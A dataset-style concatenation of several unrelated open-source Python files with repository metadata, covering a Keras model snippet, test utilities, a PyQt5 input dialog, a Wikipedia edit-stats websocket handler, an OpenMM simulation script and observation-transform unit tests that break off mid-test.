filters = [32, 64, 128, 256]
pooling_sizes = [2, 2, 2, 2]
inputs = Input(shape=input_shape)
x = CNN1D(filters=filters, pooling_sizes=pooling_sizes)(inputs)
model = Model(inputs=inputs, outputs=x)
model.summary()
| 37.393939 | 112 | 0.573339 | 1,986 | 0.8047 | 0 | 0 | 0 | 0 | 0 | 0 | 498 | 0.201783 |
a81433a2173979769be9813ef0e72f88f835d3f9 | 339 | py | Python | 1 clean code/auto_format_on_save.py | philippschmalen/ml-devops-engineer | 98c4c94b807215e2a909905235bde4a8d022477f | [
"MIT"
]
| null | null | null | 1 clean code/auto_format_on_save.py | philippschmalen/ml-devops-engineer | 98c4c94b807215e2a909905235bde4a8d022477f | [
"MIT"
]
| null | null | null | 1 clean code/auto_format_on_save.py | philippschmalen/ml-devops-engineer | 98c4c94b807215e2a909905235bde4a8d022477f | [
"MIT"
]
| null | null | null | """
Play with autoformatting on save
Ensure to pip install black within your environment
"""
# test linting with an unnecessary import
# it should complain and suggest a solution
import sys
thisdict = {
"brand": "Ford",
"model": "Mustang",
"year": 1964,
"okay": "This is getting way too long",
}
def hello():
pass
| 16.142857 | 51 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 247 | 0.728614 |
a81435452d7a1fd0220c50904adbc5e774a45f27 | 931 | py | Python | test/utils.py | eddrial/aapy | 929f554aea24c0a893052f0907488e0a843fd5dd | [
"Apache-2.0"
]
| null | null | null | test/utils.py | eddrial/aapy | 929f554aea24c0a893052f0907488e0a843fd5dd | [
"Apache-2.0"
]
| null | null | null | test/utils.py | eddrial/aapy | 929f554aea24c0a893052f0907488e0a843fd5dd | [
"Apache-2.0"
]
| null | null | null | import json
import os
import mock
def mock_response(json_str=None, raw=None):
resp = mock.MagicMock()
if json_str is not None:
loaded_json = json.loads(json_str)
resp.json = mock.MagicMock(return_value=loaded_json)
if raw is not None:
resp.raw = mock.MagicMock()
resp.raw.read = mock.MagicMock(return_value=raw)
return resp
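# Example: resp = mock_response(json_str='{"a": 1}') yields resp.json() == {'a': 1}.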
def get_data_filepath(filename):
"""Construct filepath for a file in the test/data directory
Args:
filename: name of file
Returns:
full path to file
"""
return os.path.join(os.path.dirname(__file__), 'data', filename)
def load_from_file(filename):
"""Load the contents of a file in the data directory.
Args:
filename: name of file to load
Returns:
contents of file as a string
"""
filepath = get_data_filepath(filename)
with open(filepath) as f:
return f.read()
| 21.159091 | 68 | 0.651987 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 317 | 0.340494 |
a81666f0e6701e07b7dd6f00c88fe2096ec32290 | 391 | py | Python | archive/AIAP_v1.00/v1.2b/promoter_bin.py | ShaopengLiu1/Zhanglab_ATAC-seq_analysis | 3f615c159bb04fcc3f7b777e00c5f04ff105898c | [
"MIT"
]
| null | null | null | archive/AIAP_v1.00/v1.2b/promoter_bin.py | ShaopengLiu1/Zhanglab_ATAC-seq_analysis | 3f615c159bb04fcc3f7b777e00c5f04ff105898c | [
"MIT"
]
| null | null | null | archive/AIAP_v1.00/v1.2b/promoter_bin.py | ShaopengLiu1/Zhanglab_ATAC-seq_analysis | 3f615c159bb04fcc3f7b777e00c5f04ff105898c | [
"MIT"
]
| 1 | 2018-02-26T03:14:46.000Z | 2018-02-26T03:14:46.000Z | import sys
peak=[]
with open(sys.argv[1],'r') as f:
for line in f:
line=line.strip('\n').split('\t')
peak.append(int(line[3]))
f.close()
num=int(len(peak)/100.0)
bin=[]
for i in range(99):
bin.append(str(i+1)+'\t'+str(sum(peak[num*i:num*(i+1)])/(num*1.0))+'\n')
bin.append('100'+'\t'+str(sum(peak[num*99:])/(num*1.0))+'\n')
with open('bin.txt','w') as f:
f.writelines(bin)
f.close
| 20.578947 | 73 | 0.59335 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 44 | 0.112532 |
a8172aac1601eb8a00a3b924aa63876138f48a83 | 1,347 | py | Python | Code/Database Creator/examples.py | Storm-Petrel/HawkEye | f9afde3866ab9e5e71de7f2be4d836be9ed48d69 | [
"MIT"
]
| null | null | null | Code/Database Creator/examples.py | Storm-Petrel/HawkEye | f9afde3866ab9e5e71de7f2be4d836be9ed48d69 | [
"MIT"
]
| null | null | null | Code/Database Creator/examples.py | Storm-Petrel/HawkEye | f9afde3866ab9e5e71de7f2be4d836be9ed48d69 | [
"MIT"
]
| null | null | null | import csv
from faker import Faker
fake = Faker()
for x in range(0, 10):
placa = fake.pystr(min_chars=3, max_chars=3).upper() + str(fake.pydecimal(left_digits=1, right_digits=1, positive=True)) + str(fake.pydecimal(left_digits=1, right_digits=1, positive=True))
placa = placa.replace(".","")
atualLat = str(fake.geo_coordinate(center=-8.059845, radius=0.001))
atualLon = str(fake.geo_coordinate(center=-34.905552, radius=0.001))
geo0Lat = str(fake.geo_coordinate(center=-8.021154, radius=0.001))
geo0Lon = str(fake.geo_coordinate(center=-34.933909, radius=0.001))
geo1Lat = str(fake.geo_coordinate(center=-8.027868, radius=0.001))
geo1Lon = str(fake.geo_coordinate(center=-34.852109, radius=0.001))
geo2Lat = str(fake.geo_coordinate(center=-8.122738, radius=0.001))
geo2Lon = str(fake.geo_coordinate(center=-34.874526, radius=0.001))
geo3Lat = str(fake.geo_coordinate(center=-8.052431, radius=0.001))
geo3Lon = str(fake.geo_coordinate(center=-34.959744, radius=0.001))
csvRow = [placa,atualLat,atualLon,geo0Lat,geo0Lon,geo1Lat,geo1Lon,geo2Lat,geo2Lon,geo3Lat,geo3Lon,"0","0"]
with open('cars.csv', 'a', newline='\n') as csvfile:
spamwriter = csv.writer(csvfile, delimiter=',',quotechar='|',quoting=csv.QUOTE_MINIMAL)
spamwriter.writerow(csvRow)
| 51.807692 | 193 | 0.697847 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.025241 |
a8178087a6d24532c3fa392eae43c6d6a8b30612 | 4,595 | py | Python | MultiInputDialog.py | chemmatcars/XModFit | 7d1298448d1908d78797fd67ce0a00ecfaf17629 | [
"MIT"
]
| null | null | null | MultiInputDialog.py | chemmatcars/XModFit | 7d1298448d1908d78797fd67ce0a00ecfaf17629 | [
"MIT"
]
| 2 | 2019-07-31T23:14:14.000Z | 2020-12-26T16:27:02.000Z | MultiInputDialog.py | chemmatcars/XModFit | 7d1298448d1908d78797fd67ce0a00ecfaf17629 | [
"MIT"
]
| 2 | 2019-07-31T22:22:06.000Z | 2020-07-14T04:58:16.000Z | from PyQt5.QtWidgets import QWidget, QApplication, QPushButton, QLabel, QLineEdit, QVBoxLayout, QMessageBox, QCheckBox,\
QSpinBox, QComboBox, QListWidget, QDialog, QFileDialog, QProgressBar, QTableWidget, QTableWidgetItem,\
QAbstractItemView, QSpinBox, QSplitter, QSizePolicy, QAbstractScrollArea, QHBoxLayout, QTextEdit, QShortcut,\
QProgressDialog
from PyQt5.QtGui import QPalette, QKeySequence, QDoubleValidator, QIntValidator
from PyQt5.QtCore import Qt, QThread, QSignalMapper
import sys
import pyqtgraph as pg
class MultiInputDialog(QDialog):
    def __init__(self, inputs=None, title='Multi Input Dialog', parent=None):
        QDialog.__init__(self, parent)
        self.setWindowTitle(title)
        # Avoid a mutable default argument; fall back to a sample input dict.
        self.inputs = inputs if inputs is not None else {'Input': 'default value'}
self.intValidator = QIntValidator()
self.floatValidator = QDoubleValidator()
self.createUI()
def createUI(self):
self.vblayout = QVBoxLayout(self)
self.layoutWidget = pg.LayoutWidget()
self.vblayout.addWidget(self.layoutWidget)
self.labels={}
self.inputFields={}
for key, value in self.inputs.items():
self.labels[key] = QLabel(key)
self.layoutWidget.addWidget(self.labels[key])
if type(value)==int:
self.signalMapper1 = QSignalMapper(self)
self.inputFields[key]=QLineEdit(str(value))
self.inputFields[key].setValidator(self.intValidator)
self.inputFields[key].textChanged.connect(self.signalMapper1.map)
self.signalMapper1.setMapping(self.inputFields[key], key)
self.signalMapper1.mapped[str].connect(self.inputChanged)
elif type(value)==float:
self.signalMapper2 = QSignalMapper(self)
self.inputFields[key]=QLineEdit(str(value))
self.inputFields[key].setValidator(self.floatValidator)
self.inputFields[key].textChanged.connect(self.signalMapper2.map)
self.signalMapper2.setMapping(self.inputFields[key], key)
self.signalMapper2.mapped[str].connect(self.inputChanged)
elif type(value)==bool:
self.signalMapper3 = QSignalMapper(self)
self.inputFields[key]=QCheckBox()
self.inputFields[key].setTristate(False)
self.inputFields[key].stateChanged.connect(self.signalMapper3.map)
self.signalMapper3.setMapping(self.inputFields[key], key)
self.signalMapper3.mapped[str].connect(self.inputStateChanged)
elif type(value)==str:
self.signalMapper4 = QSignalMapper(self)
self.inputFields[key] = QLineEdit(value)
self.inputFields[key].textChanged.connect(self.signalMapper4.map)
self.signalMapper4.setMapping(self.inputFields[key], key)
self.signalMapper4.mapped[str].connect(self.inputChanged)
elif type(value)==list:
self.signalMapper5 = QSignalMapper(self)
self.inputFields[key] = QComboBox()
self.inputFields[key].addItems(value)
self.inputFields[key].currentTextChanged.connect(self.signalMapper5.map)
self.signalMapper5.setMapping(self.inputFields[key], key)
self.signalMapper5.mapped[str].connect(self.inputTextChanged)
self.layoutWidget.addWidget(self.inputFields[key])
self.layoutWidget.nextRow()
self.layoutWidget.nextRow()
self.cancelButton = QPushButton('Cancel')
self.cancelButton.clicked.connect(self.cancelandClose)
self.layoutWidget.addWidget(self.cancelButton, col=0)
self.okButton = QPushButton('OK')
self.okButton.clicked.connect(self.okandClose)
self.layoutWidget.addWidget(self.okButton, col=1)
self.okButton.setDefault(True)
def inputChanged(self, key):
self.inputs[key]=self.inputFields[key].text()
def inputStateChanged(self, key):
if self.inputFields[key].checkState():
self.inputs[key]=True
else:
self.inputs[key]=False
def inputTextChanged(self, key):
self.inputs[key]=self.inputFields[key].currentText()
print(self.inputs[key])
def okandClose(self):
self.accept()
def cancelandClose(self):
self.reject()
if __name__=='__main__':
app = QApplication(sys.argv)
dlg = MultiInputDialog(inputs={'value':100,'value2':10.0,'fit':True,'func':['Lor','Gau']})
dlg.show()
sys.exit(app.exec_()) | 47.864583 | 120 | 0.654189 | 3,871 | 0.842437 | 0 | 0 | 0 | 0 | 0 | 0 | 100 | 0.021763 |
a81b25109e2c25d80338be4ee486823e581a2347 | 3,813 | py | Python | src/handlers.py | jneethling/WikiStats | 232640bf3799851554fa4c13cee8a7f63eb532e2 | [
"MIT"
]
| null | null | null | src/handlers.py | jneethling/WikiStats | 232640bf3799851554fa4c13cee8a7f63eb532e2 | [
"MIT"
]
| 1 | 2022-01-09T12:07:13.000Z | 2022-01-09T15:29:41.000Z | src/handlers.py | jneethling/WikiStats | 232640bf3799851554fa4c13cee8a7f63eb532e2 | [
"MIT"
]
| null | null | null | import os
import psutil
import json
import sqlite3
import threading
from datetime import datetime, timezone
from websocket import create_connection
class CustomHandler:
def __init__(self):
self.working = False
self.counter = 0
self.ws = None
if self.dbReady('./data/wiki_statsDB'):
self.setStatus(True, 'Function handler on standby')
else:
self.setStatus(False, 'Database error, cannot start service')
def dbReady(self, path) -> bool:
try:
self.db = sqlite3.connect(path, check_same_thread=False)
self.cursor = self.db.cursor()
self.cursor.execute('''CREATE TABLE IF NOT EXISTS stats(\
id INTEGER PRIMARY KEY,\
country_name TEXT,\
change_size INTEGER)''')
self.db.commit()
return True
except sqlite3.OperationalError:
return False
def worker(self, stop_event):
while not stop_event.is_set():
result = self.ws.recv()
country = None
if "geo_ip" in result:
j_dict = json.loads(result)
geo = j_dict.get("geo_ip")
country = geo.get("country_name")
change = j_dict.get("change_size")
if change is None:
change = 0
if country is not None:
self.cursor.execute('''INSERT INTO stats(country_name, change_size) VALUES(?,?)''', (country, change))
self.db.commit()
self.counter += 1
def setStatus(self, status, msg):
self.status = status
self.message = msg
def getStatus(self) -> json:
stat_result = os.stat('./data/wiki_statsDB')
modified = datetime.fromtimestamp(stat_result.st_mtime, tz=timezone.utc).strftime("%m/%d/%Y, %H:%M:%S")
msg = {"Status": self.status, "Message": self.message, "Working in background": self.working, "Records in session": self.counter, "DB size (bytes)": stat_result.st_size, "Modified": modified}
return msg
def getMemory(self) -> json:
memory = 1024 * 1024
proc = psutil.Process(os.getpid())
mem0 = proc.memory_info().rss
msg = str(mem0/memory) + 'Mb'
return {'Memory use': msg}
def getTotals(self) -> json:
data = {}
self.cursor.execute('''SELECT country_name, SUM(change_size) FROM stats GROUP BY country_name''')
for row in self.cursor:
data[row[0]] = row[1]
msg = json.dumps(data)
return msg
def getCounts(self) -> json:
data = {}
self.cursor.execute('''SELECT country_name, COUNT(country_name) FROM stats GROUP BY country_name''')
for row in self.cursor:
data[row[0]] = row[1]
msg = json.dumps(data)
return msg
def stopWork(self) -> json:
        self.ws.close()  # call close(); the bare attribute access was a no-op
self.working = False
self.kill_switch.set()
self.t.join()
self.setStatus(True, 'Function handler on standby')
msg = 'Function handler background work stopped'
return {'message': msg}
def startWork(self) -> json:
if self.working:
msg = 'Function handler already working in background, ignoring request'
return {"message": msg}
else:
self.ws = create_connection("ws://wikimon.hatnote.com:9000")
self.working = True
self.setStatus(True, 'Function handler working in background')
self.kill_switch = threading.Event()
self.t = threading.Thread(target=self.worker, args=(self.kill_switch,))
self.t.start()
msg = 'Function handler background work started'
return {'message': msg}
| 32.87069 | 199 | 0.575924 | 3,654 | 0.958301 | 0 | 0 | 0 | 0 | 0 | 0 | 911 | 0.238919 |
a81d611063f78006b5948c72bc4dd6b96d015544 | 1,035 | py | Python | simulate/continue.py | kmckiern/scripts | acc8326ca653d804ee06752af9e7f5b011fc6e0e | [
"MIT"
]
| 2 | 2015-04-27T01:57:43.000Z | 2015-05-01T18:18:56.000Z | simulate/continue.py | kmckiern/scripts | acc8326ca653d804ee06752af9e7f5b011fc6e0e | [
"MIT"
]
| null | null | null | simulate/continue.py | kmckiern/scripts | acc8326ca653d804ee06752af9e7f5b011fc6e0e | [
"MIT"
]
| null | null | null | from __future__ import print_function
from simtk.openmm import app
import simtk.openmm as mm
from simtk import unit
from sys import stdout
import os
import time
import numpy as np
import argparse
from equil import setup_sim, dynamix
parser = argparse.ArgumentParser(description='equilibrate structures')
parser.add_argument('--sys', type=str, help='system pdb preface')
parser.add_argument('--pdb', type=str, help='IC pdb')
parser.add_argument('--nmin', type=int, help='number of minimization steps', default=50)
parser.add_argument('--nstep', type=int, help='number of steps')
args = parser.parse_args()
systm = args.sys
ns = args.nstep
# load initial parameters and geometry
prmtop = app.AmberPrmtopFile(systm + '.prmtop')
pdb = app.PDBFile(args.pdb)
# eq temp
temp = 300.0
# timestep
ts = 2.0
qs = pdb.positions
top = pdb.topology
unit_cell = top.getUnitCellDimensions()
box = unit_cell*np.eye(3)
# run it!
sim = setup_sim(prmtop, temp, ts, qs, 'gpu', top, box)
dynamix(systm, sim, ns, prmtop, temp, ts, 'gpu', min=args.nmin)
| 26.538462 | 88 | 0.745894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 215 | 0.207729 |
a81eba16cf9a55afaac7c0432d5bc776ba731b35 | 40,893 | py | Python | py/agentflow/preprocessors/observation_transforms_test.py | wx-b/dm_robotics | 5d407622360ccf7f0b4b50bcee84589e2cfd0783 | [
"Apache-2.0"
]
| 128 | 2021-09-08T18:39:39.000Z | 2022-03-27T11:29:05.000Z | py/agentflow/preprocessors/observation_transforms_test.py | wx-b/dm_robotics | 5d407622360ccf7f0b4b50bcee84589e2cfd0783 | [
"Apache-2.0"
]
| 7 | 2021-10-11T14:26:17.000Z | 2022-03-15T17:26:45.000Z | py/agentflow/preprocessors/observation_transforms_test.py | LaudateCorpus1/dm_robotics | 647bc810788c74972c1684a8d2e4d2dfd2791485 | [
"Apache-2.0"
]
| 8 | 2021-09-08T18:25:49.000Z | 2022-02-21T23:45:16.000Z | # Copyright 2020 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# python3
"""Tests for observations_transforms."""
import copy
from typing import Mapping, Optional, Type
from absl.testing import absltest
from absl.testing import parameterized
import cv2
import dm_env
from dm_env import specs
from dm_robotics.agentflow import spec_utils
from dm_robotics.agentflow import testing_functions
from dm_robotics.agentflow.preprocessors import observation_transforms
from dm_robotics.agentflow.preprocessors import timestep_preprocessor
from dm_robotics.transformations import transformations as tr
import numpy as np
_DEFAULT_TYPE = np.float64
def scalar_array_spec(name: str, dtype: Type[np.floating] = _DEFAULT_TYPE):
return specs.Array(shape=(), dtype=dtype, name=name)
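# e.g. scalar_array_spec('reward') -> specs.Array(shape=(), dtype=np.float64, name='reward').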
@parameterized.parameters(
(observation_transforms.CastPreprocessor, float, float, float),
(observation_transforms.CastPreprocessor, np.float32, float,
float),
(observation_transforms.CastPreprocessor, np.float64, float,
float),
(observation_transforms.CastPreprocessor, float, np.float32,
np.float32),
(observation_transforms.CastPreprocessor, np.float32, np.float32,
np.float32),
(observation_transforms.CastPreprocessor, np.float64, np.float32,
np.float32),
(observation_transforms.CastPreprocessor, float, np.float64,
np.float64),
(observation_transforms.CastPreprocessor, np.float32, np.float64,
np.float64),
(observation_transforms.CastPreprocessor, np.float64, np.float64,
np.float64),
(observation_transforms.DowncastFloatPreprocessor, float, float,
float),
(observation_transforms.DowncastFloatPreprocessor, np.float32,
float, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float64,
float, float),
(observation_transforms.DowncastFloatPreprocessor, float,
np.float32, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float32,
np.float32, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float64,
np.float32, np.float32),
(observation_transforms.DowncastFloatPreprocessor, float,
np.float64, float),
(observation_transforms.DowncastFloatPreprocessor, np.float32,
np.float64, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float64,
np.float64, np.float64),
(observation_transforms.DowncastFloatPreprocessor, np.float128,
np.float64, np.float64),
# Non-floating point types should not be interefered with.
(observation_transforms.DowncastFloatPreprocessor, np.int32,
np.float64, np.int32),
)
class CastAndDowncastPreprocessorTest(absltest.TestCase):
def testCastPreprocessor_Array(
self, processor_type: timestep_preprocessor.TimestepPreprocessor,
src_type: Type[np.number], transform_type: Type[np.number],
expected_type: Type[np.number]):
# Arrange:
name = testing_functions.random_string(3)
processor = processor_type(transform_type)
input_observation_spec = {
name: specs.Array(shape=(2,), dtype=src_type, name=name),
}
expected_observation_spec = {
name: specs.Array(shape=(2,), dtype=expected_type, name=name),
}
input_reward_spec = scalar_array_spec(dtype=src_type,
name='reward')
expected_reward_spec = scalar_array_spec(dtype=expected_type,
name='reward')
input_discount_spec = scalar_array_spec(dtype=src_type,
name='discount')
expected_discount_spec = scalar_array_spec(dtype=expected_type,
name='discount')
input_timestep_spec = spec_utils.TimeStepSpec(
observation_spec=input_observation_spec,
reward_spec=input_reward_spec,
discount_spec=input_discount_spec)
input_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=np.random.choice(list(dm_env.StepType)),
reward=src_type(0.1),
discount=src_type(0.2),
observation={name: np.asarray([0.3, 0.4], dtype=src_type)},
pterm=0.1,
result=None)
# Act:
spec_utils.validate_timestep(input_timestep_spec, input_timestep)
output_timestep_spec = processor.setup_io_spec(input_timestep_spec)
# Assert:
expected_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=input_timestep.step_type,
reward=expected_type(0.1),
discount=expected_type(0.2),
observation={name: np.asarray([0.3, 0.4], dtype=expected_type)},
pterm=input_timestep.pterm,
result=None)
self.assertEqual(output_timestep_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_timestep_spec.reward_spec, expected_reward_spec)
self.assertEqual(output_timestep_spec.discount_spec, expected_discount_spec)
output_timestep = processor.process(input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(output_timestep.observation[name],
expected_timestep.observation[name])
np.testing.assert_almost_equal(output_timestep.reward,
expected_timestep.reward)
np.testing.assert_almost_equal(output_timestep.discount,
expected_timestep.discount)
def testCastPreprocessor_BoundedArray(
self, processor_type: timestep_preprocessor.TimestepPreprocessor,
src_type: Type[np.number], transform_type: Type[np.number],
expected_type: Type[np.number]):
"""Same as previous test, but using BoundedArray specs."""
# Arrange:
name = testing_functions.random_string(3)
processor = processor_type(transform_type)
input_minimum = np.asarray([0.3, 0.4], dtype=src_type)
input_maximum = np.asarray([0.5, 0.6], dtype=src_type)
input_observation_spec = {
name:
specs.BoundedArray(
shape=(2,),
dtype=src_type,
minimum=input_minimum,
maximum=input_maximum,
name=name),
}
input_reward_spec = scalar_array_spec(name='reward', dtype=src_type)
input_discount_spec = scalar_array_spec(name='discount', dtype=src_type)
input_timestep_spec = spec_utils.TimeStepSpec(
observation_spec=input_observation_spec,
reward_spec=input_reward_spec,
discount_spec=input_discount_spec)
input_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=np.random.choice(list(dm_env.StepType)),
reward=src_type(0.1),
discount=src_type(0.2),
observation={name: np.asarray([0.4, 0.5], dtype=src_type)},
pterm=0.1,
result=None)
# Act:
spec_utils.validate_timestep(input_timestep_spec, input_timestep)
output_timestep_spec = processor.setup_io_spec(input_timestep_spec)
# Assert:
expected_minimum = np.asarray([0.3, 0.4], dtype=expected_type)
expected_maximum = np.asarray([0.5, 0.6], dtype=expected_type)
expected_output_observation_spec = {
name:
specs.BoundedArray(
shape=(2,),
dtype=expected_type,
minimum=expected_minimum,
maximum=expected_maximum,
name=name),
}
expected_output_reward_spec = scalar_array_spec(
name='reward', dtype=expected_type)
expected_output_discount_spec = scalar_array_spec(
name='discount', dtype=expected_type)
expected_output_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=input_timestep.step_type,
reward=expected_type(0.1),
discount=expected_type(0.2),
observation={name: np.asarray([0.4, 0.5], dtype=expected_type)},
pterm=input_timestep.pterm,
result=None)
self.assertEqual(
set(output_timestep_spec.observation_spec.keys()),
set(expected_output_observation_spec.keys()))
spec_utils.verify_specs_equal_bounded(
output_timestep_spec.observation_spec[name],
expected_output_observation_spec[name])
self.assertEqual(output_timestep_spec.reward_spec,
expected_output_reward_spec)
self.assertEqual(output_timestep_spec.discount_spec,
expected_output_discount_spec)
output_timestep = processor.process(input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(output_timestep.observation[name],
expected_output_timestep.observation[name])
np.testing.assert_almost_equal(output_timestep.reward,
expected_output_timestep.reward)
np.testing.assert_almost_equal(output_timestep.discount,
expected_output_timestep.discount)
def testCastPreprocessor_RewardArray(
self, processor_type: timestep_preprocessor.TimestepPreprocessor,
src_type: Type[np.number], transform_type: Type[np.number],
expected_type: Type[np.number]):
# Arrange:
name = testing_functions.random_string(3)
processor = processor_type(transform_type)
input_observation_spec = {
name: specs.Array(shape=(2,), dtype=src_type, name=name),
}
expected_observation_spec = {
name: specs.Array(shape=(2,), dtype=expected_type, name=name),
}
input_reward_spec = specs.Array(shape=(3,), dtype=src_type,
name='reward')
expected_reward_spec = specs.Array(
shape=(3,), dtype=expected_type, name='reward')
input_discount_spec = scalar_array_spec(dtype=src_type,
name='discount')
expected_discount_spec = scalar_array_spec(dtype=expected_type,
name='discount')
input_timestep_spec = spec_utils.TimeStepSpec(
observation_spec=input_observation_spec,
reward_spec=input_reward_spec,
discount_spec=input_discount_spec)
# Some test data that matches the src_type.
if np.issubdtype(src_type, np.floating):
numbers = (0.1, 0.2, 0.3, 0.4, 0.1)
elif np.issubdtype(src_type, np.integer):
numbers = (1, 2, 3, 4, 5)
else:
raise ValueError(
'Only ints and floats are currently supported.')
input_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=np.random.choice(list(dm_env.StepType)),
reward=numbers[0] * np.ones(shape=(3,), dtype=src_type),
discount=src_type(numbers[1]),
observation={name: np.asarray(numbers[2:4], dtype=src_type)},
pterm=numbers[4],
result=None)
# Act:
spec_utils.validate_timestep(input_timestep_spec, input_timestep)
output_timestep_spec = processor.setup_io_spec(input_timestep_spec)
# Assert:
expected_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=input_timestep.step_type,
reward=numbers[0] * np.ones(shape=(3,), dtype=expected_type),
discount=expected_type(numbers[1]),
observation={name: np.asarray(numbers[2:4], dtype=expected_type)},
pterm=input_timestep.pterm,
result=None)
self.assertEqual(output_timestep_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_timestep_spec.reward_spec, expected_reward_spec)
self.assertEqual(output_timestep_spec.discount_spec, expected_discount_spec)
output_timestep = processor.process(input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(output_timestep.observation[name],
expected_timestep.observation[name])
np.testing.assert_almost_equal(output_timestep.reward,
expected_timestep.reward)
np.testing.assert_almost_equal(output_timestep.discount,
expected_timestep.discount)
class RenameObservationsTest(absltest.TestCase):
def test_rename_observations(self):
preprocessor = observation_transforms.RenameObservations(
obs_mapping={'foo': 'pow', 'faw': 'biz'})
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
input_obs = {'foo': [1., 2.], 'bar': [3., 4.], 'faw': [5., 6.]}
input_timestep = dm_env.TimeStep(
step_type=dm_env.StepType.MID,
reward=_DEFAULT_TYPE(0.1),
discount=_DEFAULT_TYPE(0.8),
observation=input_obs)
# Setup expectations.
expected_output_spec = input_spec.replace(observation_spec={
'pow': specs.Array(shape=(2,), dtype=np.float64, name='pow'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'biz': specs.Array(shape=(2,), dtype=np.float64, name='biz'),
})
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
np.testing.assert_array_equal(output_timestep.observation['pow'], [1., 2.])
def test_failure_when_renaming_missing_observations(self):
preprocessor = observation_transforms.RenameObservations(
obs_mapping={'foo': 'pow', 'faw': 'biz'})
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
def test_failure_for_duplicate_rename_targets(self):
obs_mapping = {'foo': 'pow', 'bar': 'pow'}
# Initialization should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
observation_transforms.RenameObservations(obs_mapping)
def test_failure_for_conflicting_rename_targets(self):
# Create the spec and timestep.
preprocessor = observation_transforms.RenameObservations(
obs_mapping={'foo': 'pow', 'faw': 'bar'})
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
class MergeObservationsTest(absltest.TestCase):
def test_merge_observation(self):
preprocessor = observation_transforms.MergeObservations(
obs_to_merge=['foo', 'bar'], new_obs='baz')
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
input_obs = {'foo': [1., 2.], 'bar': [3., 4.], 'faw': [3., 4.]}
input_timestep = dm_env.TimeStep(
step_type=dm_env.StepType.MID,
reward=_DEFAULT_TYPE(0.1),
discount=_DEFAULT_TYPE(0.8),
observation=input_obs)
# Setup expectations.
expected_output_spec = input_spec.replace(observation_spec={
'baz': specs.Array(shape=(4,), dtype=np.float64, name='baz'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw')
})
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
np.testing.assert_array_equal(output_timestep.observation['baz'],
[1., 2., 3., 4.])
def test_failure_when_merging_missing_observation(self):
preprocessor = observation_transforms.MergeObservations(
obs_to_merge=['foo', 'bar'], new_obs='baz')
# Generate the input spec
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo')}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
def test_failure_for_conflicting_new_name(self):
preprocessor = observation_transforms.MergeObservations(
obs_to_merge=['foo', 'bar'], new_obs='faw')
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
